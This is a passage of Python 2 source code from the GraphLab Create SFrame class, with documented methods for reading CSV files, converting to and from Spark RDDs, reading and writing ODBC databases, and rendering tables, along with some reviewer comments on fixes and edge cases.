{'https://s3.amazonaws.com/gl-testdata/bad_csv_example.csv': dtype: str
Rows: 1
['x,y,z,a,b,c']}
"""
return cls._read_csv_impl(url,
delimiter=delimiter,
header=header,
error_bad_lines=False, # we are storing errors,
# thus we must not fail
# on bad lines
comment_char=comment_char,
escape_char=escape_char,
double_quote=double_quote,
quote_char=quote_char,
skip_initial_space=skip_initial_space,
column_type_hints=column_type_hints,
na_values=na_values,
nrows=nrows,
verbose=verbose,
store_errors=True)
@classmethod
def read_csv(cls,
url,
delimiter=',',
header=True,
error_bad_lines=False,
comment_char='',
escape_char='\\',
double_quote=True,
quote_char='\"',
skip_initial_space=True,
column_type_hints=None,
na_values=["NA"],
nrows=None,
verbose=True):
"""
Constructs an SFrame from a CSV file or a path to multiple CSVs.
Parameters
----------
url : string
Location of the CSV file or directory to load. If URL is a directory
or a "glob" pattern, all matching files will be loaded.
delimiter : string, optional
This describes the delimiter used for parsing csv files.
header : bool, optional
If true, uses the first row as the column names. Otherwise use the
default column names : 'X1, X2, ...'.
error_bad_lines : bool
If true, will fail upon encountering a bad line. If false, will
continue parsing skipping lines which fail to parse correctly.
A sample of the first 10 encountered bad lines will be printed.
comment_char : string, optional
The character which denotes that the remainder of the line is a
comment.
escape_char : string, optional
Character which begins a C escape sequence
double_quote : bool, optional
If True, two consecutive quotes in a string are parsed to a single
quote.
quote_char : string, optional
Character sequence that indicates a quote.
skip_initial_space : bool, optional
Ignore extra spaces at the start of a field
column_type_hints : None, type, list[type], dict[string, type], optional
This provides type hints for each column. By default, this method
attempts to detect the type of each column automatically.
Supported types are int, float, str, list, dict, and array.array.
* If a single type is provided, the type will be
applied to all columns. For instance, column_type_hints=float
will force all columns to be parsed as float.
* If a list of types is provided, the types applies
to each column in order, e.g.[int, float, str]
will parse the first column as int, second as float and third as
string.
* If a dictionary of column name to type is provided,
each type value in the dictionary is applied to the key it
belongs to.
For instance {'user':int} will hint that the column called "user"
should be parsed as an integer, and the rest will default to
string.
na_values : str | list of str, optional
A string or list of strings to be interpreted as missing values.
nrows : int, optional
If set, only this many rows will be read from the file.
verbose : bool, optional
If True, print the progress.
Returns
-------
out : SFrame
See Also
--------
read_csv_with_errors, SFrame
Examples
--------
Read a regular csv file, with all default options, automatically
determine types:
>>> url = 'http://s3.amazonaws.com/gl-testdata/rating_data_example.csv'
>>> sf = graphlab.SFrame.read_csv(url)
>>> sf
Columns:
user_id int
movie_id int
rating int
Rows: 10000
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Read only the first 100 lines of the csv file:
>>> sf = graphlab.SFrame.read_csv(url, nrows=100)
>>> sf
Columns:
user_id int
movie_id int
rating int
Rows: 100
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[100 rows x 3 columns]
Read all columns as str type
>>> sf = graphlab.SFrame.read_csv(url, column_type_hints=str)
>>> sf
Columns:
user_id str
movie_id str
rating str
Rows: 10000
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Specify types for a subset of columns and leave the rest to be str.
>>> sf = graphlab.SFrame.read_csv(url,
... column_type_hints={
... 'user_id':int, 'rating':float
... })
>>> sf
Columns:
user_id str
movie_id str
rating float
Rows: 10000
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | 3.0 |
| 25907 | 1663 | 3.0 |
| 25923 | 1663 | 3.0 |
| 25924 | 1663 | 3.0 |
| 25928 | 1663 | 2.0 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Not treat first line as header:
>>> sf = graphlab.SFrame.read_csv(url, header=False)
>>> sf
Columns:
X1 str
X2 str
X3 str
Rows: 10001
+---------+----------+--------+
| X1 | X2 | X3 |
+---------+----------+--------+
| user_id | movie_id | rating |
| 25904 | 1663 | 3 |
| 25907 | 1663 | 3 |
| 25923 | 1663 | 3 |
| 25924 | 1663 | 3 |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10001 rows x 3 columns]
Treat '3' as missing value:
>>> sf = graphlab.SFrame.read_csv(url, na_values=['3'], column_type_hints=str)
>>> sf
Columns:
user_id str
movie_id str
rating str
Rows: 10000
+---------+----------+--------+
| user_id | movie_id | rating |
+---------+----------+--------+
| 25904 | 1663 | None |
| 25907 | 1663 | None |
| 25923 | 1663 | None |
| 25924 | 1663 | None |
| 25928 | 1663 | 2 |
| ... | ... | ... |
+---------+----------+--------+
[10000 rows x 3 columns]
Throw error on parse failure:
>>> bad_url = 'https://s3.amazonaws.com/gl-testdata/bad_csv_example.csv'
>>> sf = graphlab.SFrame.read_csv(bad_url, error_bad_lines=True)
RuntimeError: Runtime Exception. Unable to parse line "x,y,z,a,b,c"
Set error_bad_lines=False to skip bad lines
"""
return cls._read_csv_impl(url,
delimiter=delimiter,
header=header,
error_bad_lines=error_bad_lines,
comment_char=comment_char,
escape_char=escape_char,
double_quote=double_quote,
quote_char=quote_char,
skip_initial_space=skip_initial_space,
column_type_hints=column_type_hints,
na_values=na_values,
nrows=nrows,
verbose=verbose,
store_errors=False)[0]
def to_schema_rdd(self,sc,sql,number_of_partitions=4):
    """
    Convert the current SFrame to the Spark SchemaRDD.

    To enable this function, you must add the jar file bundled with GraphLab
    Create to the Spark driver's classpath. This must happen BEFORE Spark
    launches its JVM, or else it will have no effect. To do this, first get
    the location of the packaged jar with
    `graphlab.get_spark_integration_jar_path`. You then have two options:

    1. Add the path to the jar to your spark-defaults.conf file. The
       property to set is 'spark.driver.extraClassPath'.

    OR

    2. Add the jar's path as a command line option to your favorite way to
       start pyspark (either spark-submit or pyspark). For this, use the
       command line option '--driver-class-path'.

    Parameters
    ----------
    sc : SparkContext
        sc is an existing SparkContext.

    sql : SQLContext
        sql is an existing SQLContext.

    number_of_partitions : int
        number of partitions for the output rdd

    Returns
    ----------
    out: SchemaRDD

    Examples
    --------
    >>> from pyspark import SparkContext, SQLContext
    >>> from graphlab import SFrame
    >>> sc = SparkContext('local')
    >>> sqlc = SQLContext(sc)
    >>> sf = SFrame({'x': [1,2,3], 'y': ['fish', 'chips', 'salad']})
    >>> rdd = sf.to_schema_rdd(sc, sqlc)
    >>> rdd.collect()
    [Row(x=1, y=u'fish'), Row(x=2, y=u'chips'), Row(x=3, y=u'salad')]
    """
    def homogeneous_type(seq):
        # An empty (or missing) sequence is trivially homogeneous.
        if seq is None or len(seq) == 0:
            return True
        iseq = iter(seq)
        first_type = type(next(iseq))
        # Fixed idiom: the original wrote "True if all(...) else False",
        # which is a redundant wrapper around the boolean all() already
        # returns.  Element types must match the first element's type
        # exactly (subclasses do not count).
        return all(type(x) is first_type for x in iseq)

    if len(self) == 0:
        raise ValueError("SFrame is empty")

    column_names = self.column_names()
    first_row = self.head(1)[0]

    # Spark rows cannot hold heterogeneous containers, so reject any
    # iterable cell whose elements are of mixed types (checked on the
    # first row only, as in the original implementation).
    for name in column_names:
        if hasattr(first_row[name],'__iter__') and not homogeneous_type(first_row[name]):
            raise TypeError("Support for translation to Spark SchemaRDD not enabled for heterogeneous iterable type (column: %s). Use SFrame.to_rdd()." % name)

    # datetime columns are not convertible to SchemaRDD either.
    for _type in self.column_types():
        if _type.__name__ == 'datetime':
            raise TypeError("Support for translation to Spark SchemaRDD not enabled for datetime type. Use SFrame.to_rdd() ")

    # Convert to a plain RDD of dicts first, then let Spark infer the
    # schema from keyword-constructed Row objects.
    rdd = self.to_rdd(sc, number_of_partitions)
    from pyspark.sql import Row
    rowRdd = rdd.map(lambda x: Row(**x))
    return sql.inferSchema(rowRdd)
def to_rdd(self, sc, number_of_partitions=4):
    """
    Convert the current SFrame to the Spark RDD.

    To enable this function, you must add the jar file bundled with GraphLab
    Create to the Spark driver's classpath. This must happen BEFORE Spark
    launches its JVM, or else it will have no effect. To do this, first get
    the location of the packaged jar with
    `graphlab.get_spark_integration_jar_path`. You then have two options:

    1. Add the path to the jar to your spark-defaults.conf file. The
       property to set is 'spark.driver.extraClassPath'.

    OR

    2. Add the jar's path as a command line option to your favorite way to
       start pyspark (either spark-submit or pyspark). For this, use the
       command line option '--driver-class-path'.

    Parameters
    ----------
    sc : SparkContext
        sc is an existing SparkContext.

    number_of_partitions: int
        number of partitions for the output rdd

    Returns
    ----------
    out: RDD

    Examples
    --------
    >>> from pyspark import SparkContext
    >>> from graphlab import SFrame
    >>> sc = SparkContext('local')
    >>> sf = SFrame({'x': [1,2,3], 'y': ['fish', 'chips', 'salad']})
    >>> rdd = sf.to_rdd(sc)
    >>> rdd.collect()
    [{'x': 1L, 'y': 'fish'}, {'x': 2L, 'y': 'chips'}, {'x': 3L, 'y': 'salad'}]
    """
    _mt._get_metric_tracker().track('sframe.to_rdd')
    if not RDD_SUPPORT:
        raise Exception("Support for translation to Spark RDDs not enabled.")
    # Image columns cannot be piped through the external integration binary.
    for _type in self.column_types():
        if(_type.__name__ == 'Image'):
            raise TypeError("Support for translation to Spark RDDs not enabled for Image type.")
    if type(number_of_partitions) is not int:
        raise ValueError("number_of_partitions parameter expects an integer type")
    if number_of_partitions == 0:
        raise ValueError("number_of_partitions can not be initialized to zero")

    # Save SFrame in a temporary place
    tmp_loc = self.__get_staging_dir__(sc)
    sf_loc = os.path.join(tmp_loc, str(uuid.uuid4()))
    self.save(sf_loc)

    # Keep track of the temporary sframe that is saved(). We need to delete it eventually.
    dummysf = load_sframe(sf_loc)
    dummysf.__proxy__.delete_on_close()
    SFRAME_GARBAGE_COLLECTOR.append(dummysf)

    # Split the row range into `number_of_partitions` contiguous
    # "start:end" slices.  The first `num_big_partition_size` partitions
    # each get one extra row, so partition sizes differ by at most one.
    # NOTE(review): '/' relies on Python-2 integer division here; under
    # Python 3 this would yield a float -- confirm before porting.
    sframe_len = self.__len__()
    small_partition_size = sframe_len/number_of_partitions
    big_partition_size = small_partition_size + 1
    num_big_partition_size = sframe_len % number_of_partitions
    num_small_partition_size = number_of_partitions - num_big_partition_size
    count = 0
    start_index = 0
    ranges = []
    while(count < number_of_partitions):
        if(count < num_big_partition_size):
            ranges.append((str(start_index)+":"+str(start_index + big_partition_size)))
            start_index = start_index + big_partition_size
        else:
            ranges.append((str(start_index)+":"+str(start_index + small_partition_size)))
            start_index = start_index + small_partition_size
        count+=1

    from pyspark import RDD
    # Each Spark task pipes its "start:end" slice through the external
    # sframe-to-RDD binary, which reads the SFrame saved at sf_loc.
    rdd = sc.parallelize(ranges,number_of_partitions)
    # NOTE(review): pipeRdd is only assigned for the 'local' and
    # 'yarn-client' masters; any other master raises NameError at the
    # stringToByte() call below -- confirm whether other deploy modes are
    # meant to be rejected earlier.
    if sc.master[0:5] == 'local':
        pipeRdd = sc._jvm.org.graphlab.create.GraphLabUtil.pythonToJava(
            rdd._jrdd).pipe(
                BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'] + \
                " " + BINARY_PATHS['SFRAME_RDD_PATH'] + " " + sf_loc)
    elif sc.master == 'yarn-client':
        # On YARN the support binaries are shipped with the job, so they
        # are referenced relative to the task's working directory.
        pipeRdd = sc._jvm.org.graphlab.create.GraphLabUtil.pythonToJava(
            rdd._jrdd).pipe(
                "./" + SPARK_SUPPORT_NAMES['SPARK_PIPE_WRAPPER_PATH'] + \
                " " + "./" + SPARK_SUPPORT_NAMES['SFRAME_RDD_PATH'] + \
                " " + sf_loc)
    serializedRdd = sc._jvm.org.graphlab.create.GraphLabUtil.stringToByte(pipeRdd)
    import pyspark
    output_rdd = RDD(serializedRdd,sc,pyspark.serializers.PickleSerializer())
    return output_rdd
@classmethod
def __get_staging_dir__(cls,cur_sc):
    # Lazily run the module-level RDD-support initialization (which is
    # responsible for setting STAGING_DIR) the first time a staging path
    # is requested, then return the shared staging directory.  Callers
    # treat a None return as "staging directory unavailable".
    if not RDD_SUPPORT_INITED:
        __rdd_support_init__(cur_sc)
    return STAGING_DIR
@classmethod
def from_rdd(cls, rdd):
    """
    Convert a Spark RDD into a GraphLab Create SFrame.

    To enable this function, you must add the jar file bundled with GraphLab
    Create to the Spark driver's classpath. This must happen BEFORE Spark
    launches its JVM, or else it will have no effect. To do this, first get
    the location of the packaged jar with
    `graphlab.get_spark_integration_jar_path`. You then have two options:

    1. Add the path to the jar to your spark-defaults.conf file. The
       property to set is 'spark.driver.extraClassPath'.

    OR

    2. Add the jar's path as a command line option to your favorite way to
       start pyspark (either spark-submit or pyspark). For this, use the
       command line option '--driver-class-path'.

    Parameters
    ----------
    rdd : pyspark.rdd.RDD

    Returns
    -------
    out : SFrame

    Examples
    --------
    >>> from pyspark import SparkContext
    >>> from graphlab import SFrame
    >>> sc = SparkContext('local')
    >>> rdd = sc.parallelize([1,2,3])
    >>> sf = SFrame.from_rdd(rdd)
    >>> sf
    Data:
    +-----+
    | X1  |
    +-----+
    | 1.0 |
    | 2.0 |
    | 3.0 |
    +-----+
    [3 rows x 1 columns]
    """
    _mt._get_metric_tracker().track('sframe.from_rdd')
    if not RDD_SUPPORT:
        raise Exception("Support for translation to Spark RDDs not enabled.")
    # Peek at one element to reject RDDs of raw pyspark.sql.Row objects:
    # those must be converted to a SchemaRDD/DataFrame first.
    checkRes = rdd.take(1);
    if len(checkRes) > 0 and checkRes[0].__class__.__name__ == 'Row' and rdd.__class__.__name__ not in {'SchemaRDD','DataFrame'}:
        raise Exception("Conversion from RDD(pyspark.sql.Row) to SFrame not supported. Please call inferSchema(RDD) first.")
    # Text RDDs (UTF8-deserialized) take a separate, non-pickle path.
    if(rdd._jrdd_deserializer.__class__.__name__ == 'UTF8Deserializer'):
        return SFrame.__from_UTF8Deserialized_rdd__(rdd)

    sf_names = None
    rdd_type = "rdd"
    if rdd.__class__.__name__ in {'SchemaRDD','DataFrame'}:
        rdd_type = "schemardd"
        first_row = rdd.take(1)[0]
        # Column names come either from dict-like rows ('keys') or from a
        # Row's __FIELDS__ attribute.
        if hasattr(first_row, 'keys'):
            sf_names = first_row.keys()
        else:
            sf_names = first_row.__FIELDS__
        sf_names = [str(i) for i in sf_names]

    cur_sc = rdd.ctx
    tmp_loc = SFrame.__get_staging_dir__(cur_sc)
    if tmp_loc is None:
        raise RuntimeError("Could not determine staging directory for SFrame files.")
    # "batch" is the default wire format; "pickle" when the RDD uses a
    # PickleSerializer -- the external binary needs to know which.
    mode = "batch"
    if(rdd._jrdd_deserializer.__class__.__name__ == 'PickleSerializer'):
        mode = "pickle"
    if cur_sc.master[0:5] == 'local':
        t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.byteToString(
            rdd._jrdd).pipe(
                BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'] + " " + \
                BINARY_PATHS['RDD_SFRAME_PATH'] + " " + tmp_loc +\
                " " + mode + " " + rdd_type)
    else:
        # Non-local masters ship the binaries with the job, so they are
        # referenced relative to the task's working directory.
        t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.byteToString(
            rdd._jrdd).pipe(
                "./" + SPARK_SUPPORT_NAMES['SPARK_PIPE_WRAPPER_PATH'] +\
                " " + "./" + SPARK_SUPPORT_NAMES['RDD_SFRAME_PATH'] + " " +\
                tmp_loc + " " + mode + " " + rdd_type)
    # We get the location of an SFrame index file per Spark partition in
    # the result. We assume that this is in partition order.
    res = t.collect()
    out_sf = cls()
    sframe_list = []
    # NOTE(review): 'sframe_list' is never used below.
    for url in res:
        sf = SFrame()
        sf.__proxy__.load_from_sframe_index(_make_internal_url(url))
        sf.__proxy__.delete_on_close()
        out_sf_coltypes = out_sf.column_types()
        # If a later partition disagrees with the accumulated frame on a
        # column's type, coerce both sides to str so append() succeeds.
        if(len(out_sf_coltypes) != 0):
            sf_coltypes = sf.column_types()
            sf_temp_names = sf.column_names()
            out_sf_temp_names = out_sf.column_names()
            for i in range(len(sf_coltypes)):
                if sf_coltypes[i] != out_sf_coltypes[i]:
                    print "mismatch for types %s and %s" % (sf_coltypes[i],out_sf_coltypes[i])
                    sf[sf_temp_names[i]] = sf[sf_temp_names[i]].astype(str)
                    out_sf[out_sf_temp_names[i]] = out_sf[out_sf_temp_names[i]].astype(str)
        out_sf = out_sf.append(sf)
    out_sf.__proxy__.delete_on_close()
    # Restore the original column names when they were recoverable from
    # the input rows.
    if sf_names is not None:
        out_names = out_sf.column_names()
        if(set(out_names) != set(sf_names)):
            out_sf = out_sf.rename(dict(zip(out_names, sf_names)))
    return out_sf
@classmethod
def __from_UTF8Deserialized_rdd__(cls, rdd):
    # Internal helper for from_rdd(): handles RDDs whose Java side holds
    # plain UTF-8 strings (no pickling), converting them to an SFrame via
    # the external non-pickle integration binary.
    _mt._get_metric_tracker().track('sframe.__from_UTF8Deserialized_rdd__')
    if not RDD_SUPPORT:
        raise Exception("Support for translation to Spark RDDs not enabled.")
    cur_sc = rdd.ctx
    sf_names = None
    sf_types = None
    tmp_loc = SFrame.__get_staging_dir__(cur_sc)
    if tmp_loc is None:
        raise RuntimeError("Could not determine staging directory for SFrame files.")
    if(rdd.__class__.__name__ in {'SchemaRDD','DataFrame'}):
        # Schema'd input: recover both column names and element types from
        # the first row, then pass the type list to the binary.
        first_row = rdd.take(1)[0]
        if hasattr(first_row, 'keys'):
            sf_names = first_row.keys()
            sf_types = [type(i) for i in first_row.values()]
        else:
            sf_names = first_row.__FIELDS__
            sf_types = [type(i) for i in first_row]

        sf_names = [str(i) for i in sf_names]

        for _type in sf_types:
            # NOTE: 'unicode' is the Python-2 text type.
            if(_type != int and _type != str and _type != float and _type != unicode):
                raise TypeError("Only int, str, and float are supported for now")

        # Comma-separated type-name list consumed by the external binary
        # (trailing comma preserved from the original implementation).
        types = ""
        for i in sf_types:
            types += i.__name__ + ","

        if cur_sc.master[0:5] == 'local':
            t = rdd._jschema_rdd.toJavaStringOfValues().pipe(
                BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'] + " " +\
                BINARY_PATHS['RDD_SFRAME_NONPICKLE_PATH'] + " " + tmp_loc +\
                " " + types)
        else:
            t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.toJavaStringOfValues(
                rdd._jschema_rdd).pipe(
                    "./" + SPARK_SUPPORT_NAMES['SPARK_PIPE_WRAPPER_PATH'] +\
                    " " + "./" +\
                    SPARK_SUPPORT_NAMES['RDD_SFRAME_NONPICKLE_PATH'] + " " +\
                    tmp_loc + " " + types)
    else:
        # Plain string RDD: no schema, so no name/type recovery.
        if cur_sc.master[0:5] == 'local':
            t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.pythonToJava(
                rdd._jrdd).pipe(
                    BINARY_PATHS['SPARK_PIPE_WRAPPER_PATH'] + " " +\
                    BINARY_PATHS['RDD_SFRAME_NONPICKLE_PATH'] + " " +\
                    tmp_loc)
        else:
            t = cur_sc._jvm.org.graphlab.create.GraphLabUtil.pythonToJava(
                rdd._jrdd).pipe(
                    "./" + SPARK_SUPPORT_NAMES['SPARK_PIPE_WRAPPER_PATH'] +\
                    " " + "./" +\
                    SPARK_SUPPORT_NAMES['RDD_SFRAME_NONPICKLE_PATH'] + " " +\
                    tmp_loc)

    # We get the location of an SFrame index file per Spark partition in
    # the result. We assume that this is in partition order.
    res = t.collect()
    out_sf = cls()
    sframe_list = []
    # NOTE(review): 'sframe_list' is never used below.
    for url in res:
        sf = SFrame()
        sf.__proxy__.load_from_sframe_index(_make_internal_url(url))
        sf.__proxy__.delete_on_close()
        out_sf = out_sf.append(sf)
    out_sf.__proxy__.delete_on_close()
    # Restore the original column names when they were recoverable.
    if sf_names is not None:
        out_names = out_sf.column_names()
        if(set(out_names) != set(sf_names)):
            out_sf = out_sf.rename(dict(zip(out_names, sf_names)))
    return out_sf
@classmethod
def from_odbc(cls, db, sql, verbose=False):
    """
    Convert a table or query from a database to an SFrame.

    This function does not do any checking on the given SQL query, and
    cannot know what effect it will have on the database. Any side effects
    from the query will be reflected on the database. If no result
    rows are returned, an empty SFrame is created.

    Keep in mind the default case your database stores table names in. In
    some cases, you may need to add quotation marks (or whatever character
    your database uses to quote identifiers), especially if you created the
    table using `to_odbc`.

    Parameters
    ----------
    db : `graphlab.extensions._odbc_connection.unity_odbc_connection`
        An ODBC connection object. This can only be obtained by calling
        `graphlab.connect_odbc`. Check that documentation for how to create
        this object.

    sql : str
        A SQL query. The query must be acceptable by the ODBC driver used by
        `graphlab.extensions._odbc_connection.unity_odbc_connection`.

    Returns
    -------
    out : SFrame

    Notes
    -----
    This functionality is only supported when using GraphLab Create
    entirely on your local machine. Therefore, GraphLab Create's EC2 and
    Hadoop execution modes will not be able to use ODBC. Note that this
    does not apply to the machine your database is running, which can (and
    often will) be running on a separate machine.

    Examples
    --------
    >>> db = graphlab.connect_odbc("DSN=my_awesome_dsn;UID=user;PWD=mypassword")

    >>> a_table = graphlab.SFrame.from_odbc(db, "SELECT * FROM a_table")

    >>> join_result = graphlab.SFrame.from_odbc(db, 'SELECT * FROM "MyTable" a, "AnotherTable" b WHERE a.id=b.id')
    """
    result = db.execute_query(sql)
    if not isinstance(result, SFrame):
        raise RuntimeError("Cannot create an SFrame for query. No result set.")
    # Fixed: the original rebound the classmethod's 'cls' parameter to the
    # result ("cls = result; return cls"), a confusing no-op indirection.
    # The query result already is an SFrame, so return it directly.
    return result
def to_odbc(self, db, table_name, append_if_exists=False, verbose=True):
    """
    Convert an SFrame to a table in a database.

    By default, searches for a table in the database with the given name.
    If found, this will attempt to append all the rows of the SFrame to the
    end of the table. If not, this will create a new table with the given
    name. This behavior is toggled with the `append_if_exists` flag.

    When creating a new table, GraphLab Create uses a heuristic approach to
    pick a corresponding type for each column in the SFrame using the type
    information supplied by the database's ODBC driver. Your driver must
    support giving this type information for GraphLab Create to support
    writing to the database.

    To allow more expressive and accurate naming, `to_odbc` puts quotes
    around each identifier (table names and column names). Depending on
    your database, you may need to refer to the created table with quote
    characters around the name. This character is not the same for all
    databases, but '"' is the most common.

    Parameters
    ----------
    db : `graphlab.extensions._odbc_connection.unity_odbc_connection`
        An ODBC connection object. This can only be obtained by calling
        `graphlab.connect_odbc`. Check that documentation for how to create
        this object.

    table_name : str
        The name of the table you would like to create/append to.

    append_if_exists : bool
        If True, this will attempt to append to the table named `table_name`
        if it is found to exist in the database.

    verbose : bool
        Print progress updates on the insertion process.

    Notes
    -----
    This functionality is only supported when using GraphLab Create
    entirely on your local machine. Therefore, GraphLab Create's EC2 and
    Hadoop execution modes will not be able to use ODBC. Note that this
    "local machine" rule does not apply to the machine your database is
    running on, which can (and often will) be running on a separate
    machine.

    Examples
    --------
    >>> db = graphlab.connect_odbc("DSN=my_awesome_dsn;UID=user;PWD=mypassword")

    >>> sf = graphlab.SFrame({'a':[1,2,3],'b':['hi','pika','bye']})

    >>> sf.to_odbc(db, 'a_cool_table')
    """
    if (not verbose):
        glconnect.get_client().set_log_progress(False)
    # Fixed: the original did not restore progress logging if the insert
    # raised, leaving the client silently muted afterwards.  try/finally
    # guarantees the logging state is re-enabled on every exit path.
    try:
        db._insert_sframe(self, table_name, append_if_exists)
    finally:
        if (not verbose):
            glconnect.get_client().set_log_progress(True)
def __repr__(self):
    """
    Return a string description of the frame: its column schema, a row
    count (or "Unknown" for frames of unknown size), and a data preview.
    """
    preview = self._imagecols_to_stringcols()
    pieces = [self.__get_column_description__()]
    if self.__has_size__():
        pieces.append("Rows: " + str(len(self)) + "\n\n")
    else:
        pieces.append("Rows: Unknown" + "\n\n")
    pieces.append("Data:\n")
    # Show the rendered frame only when there is at least one row to show;
    # otherwise print an empty-list placeholder.
    pieces.append(str(self) if len(preview.head()) > 0 else "\t[]")
    return "".join(pieces)
def __get_column_description__(self):
    """
    Build the "Columns:" header block listing each column name and its
    type name, or a single "None" entry when the frame has no columns.
    """
    names = self.column_names()
    ctypes = self.column_types()
    parts = ["Columns:\n"]
    if len(names) > 0:
        for name, ctype in zip(names, ctypes):
            parts.append("\t" + name + "\t" + ctype.__name__ + "\n")
        parts.append("\n")
    else:
        parts.append("\tNone\n\n")
    return "".join(parts)
def __get_pretty_tables__(self, wrap_text=False, max_row_width=80,
                          max_column_width=30, max_columns=20,
                          max_rows_to_display=60):
    """
    Returns a list of pretty print tables representing the current SFrame.
    If the number of columns is larger than max_columns, the last pretty
    table will contain an extra column of "...".

    Parameters
    ----------
    wrap_text : bool, optional
    max_row_width : int, optional
        Max number of characters per table.
    max_column_width : int, optional
        Max number of characters per column.
    max_columns : int, optional
        Max number of columns per table.
    max_rows_to_display : int, optional
        Max number of rows to display.

    Returns
    -------
    out : list[PrettyTable]
    """
    headsf = self.head(max_rows_to_display)
    if headsf.shape == (0, 0):
        return [PrettyTable()]

    # convert array.array column to list column so they print like [...]
    # and not array('d', ...)
    for col in headsf.column_names():
        if headsf[col].dtype() is array.array:
            headsf[col] = headsf[col].astype(list)

    def _value_to_str(value):
        # Render arrays and lists as "[a, b, ...]" (recursively for nested
        # lists); everything else falls back to str().
        if (type(value) is array.array):
            return str(list(value))
        elif (type(value) is list):
            return '[' + ", ".join(_value_to_str(x) for x in value) + ']'
        else:
            return str(value)

    def _escape_space(s):
        # Make whitespace visible (e.g. a newline becomes '\n') so every
        # cell stays on one physical line.  NOTE: 'string_escape' is a
        # Python-2-only codec.
        return "".join([ch.encode('string_escape') if ch.isspace() else ch for ch in s])

    def _truncate_respect_unicode(s, max_length):
        # Truncate by unicode characters rather than raw bytes so that
        # multi-byte UTF-8 sequences are never cut in half.
        if (len(s) <= max_length):
            return s
        else:
            u = unicode(s, 'utf-8', errors='replace')
            return u[:max_length].encode('utf-8')

    def _truncate_str(s, wrap_str=False):
        """
        Truncate and optionally wrap the input string as unicode, replace
        unconvertible character with a diamond ?.
        """
        s = _escape_space(s)
        if len(s) <= max_column_width:
            return unicode(s, 'utf-8', errors='replace')
        else:
            ret = ''
            # if wrap_str is true, wrap the text and take at most 2 rows
            if wrap_str:
                wrapped_lines = wrap(s, max_column_width)
                if len(wrapped_lines) == 1:
                    return wrapped_lines[0]
                last_line = wrapped_lines[1]
                if len(last_line) >= max_column_width:
                    last_line = _truncate_respect_unicode(last_line, max_column_width - 4)
                ret = wrapped_lines[0] + '\n' + last_line + ' ...'
            else:
                ret = _truncate_respect_unicode(s, max_column_width - 4) + '...'
            return unicode(ret, 'utf-8', errors='replace')

    columns = self.column_names()[:max_columns]
    columns.reverse()  # reverse the order of columns and we will pop from the end
    num_column_of_last_table = 0
    row_of_tables = []
    # let's build a list of tables with max_columns
    # each table should satisfy, max_row_width, and max_column_width
    while len(columns) > 0:
        tbl = PrettyTable()
        table_width = 0
        num_column_of_last_table = 0
        while len(columns) > 0:
            col = columns.pop()
            # check the max length of element in the column
            if len(headsf) > 0:
                col_width = min(max_column_width, max(len(str(x)) for x in headsf[col]))
            else:
                col_width = max_column_width
            if (table_width + col_width < max_row_width):
                # truncate the header if necessary
                header = _truncate_str(col, wrap_text)
                tbl.add_column(header, [_truncate_str(_value_to_str(x), wrap_text) for x in headsf[col]])
                # Re-measure the rendered width from the first line of the
                # table's string form.
                table_width = str(tbl).find('\n')
                num_column_of_last_table += 1
            else:
                # the column does not fit in the current table, push it back to columns
                columns.append(col)
                break
        tbl.align = 'c'
        row_of_tables.append(tbl)

    # add a column of all "..." if there are more columns than displayed
    if self.num_cols() > max_columns:
        row_of_tables[-1].add_column('...', ['...'] * len(headsf))
        num_column_of_last_table += 1
    # add a row of all "..." if there are more rows than displayed
    if self.__has_size__() and self.num_rows() > headsf.num_rows():
        row_of_tables[-1].add_row(['...'] * num_column_of_last_table)
    return row_of_tables
def print_rows(self, num_rows=10, num_columns=40, max_column_width=30,
               max_row_width=80):
    """
    Print the first M rows and N columns of the SFrame in human readable
    format.

    Parameters
    ----------
    num_rows : int, optional
        Number of rows to print.
    num_columns : int, optional
        Number of columns to print.
    max_column_width : int, optional
        Maximum width of a column. Columns use fewer characters if possible.
    max_row_width : int, optional
        Maximum width of a printed row. Columns beyond this width wrap to a
        new line. `max_row_width` is automatically reset to be the
        larger of itself and `max_column_width`.

    See Also
    --------
    head, tail
    """
    # A row must be at least wide enough to hold one full-width column.
    max_row_width = max(max_row_width, max_column_width + 1)
    # Image columns are converted to their string form before rendering.
    printed_sf = self._imagecols_to_stringcols(num_rows)
    row_of_tables = printed_sf.__get_pretty_tables__(wrap_text=False,
                                                     max_rows_to_display=num_rows,
                                                     max_columns=num_columns,
                                                     max_column_width=max_column_width,
                                                     max_row_width=max_row_width)
    footer = "[%d rows x %d columns]\n" % self.shape
    print '\n'.join([str(tb) for tb in row_of_tables]) + "\n" + footer
def _imagecols_to_stringcols(self, num_rows=10):
    """
    Return a frame suitable for printing.  If any column holds images,
    build a copy whose first `num_rows` image cells are converted to
    strings (non-image columns are truncated to the same length);
    otherwise return self unchanged.
    """
    names = self.column_names()
    ctypes = self.column_types()
    # Names of all columns whose declared type is the image type.
    image_cols = set(name for name, ctype in zip(names, ctypes)
                     if ctype == graphlab.Image)
    if not image_cols:
        return self
    converted = SFrame()
    for name in names:
        column = self[name]
        if name in image_cols:
            converted[name] = column._head_str(num_rows)
        else:
            converted[name] = column.head(num_rows)
    return converted
def __str__(self, num_rows=10, footer=True):
    """
    Return a string with the first `num_rows` rows of the frame rendered
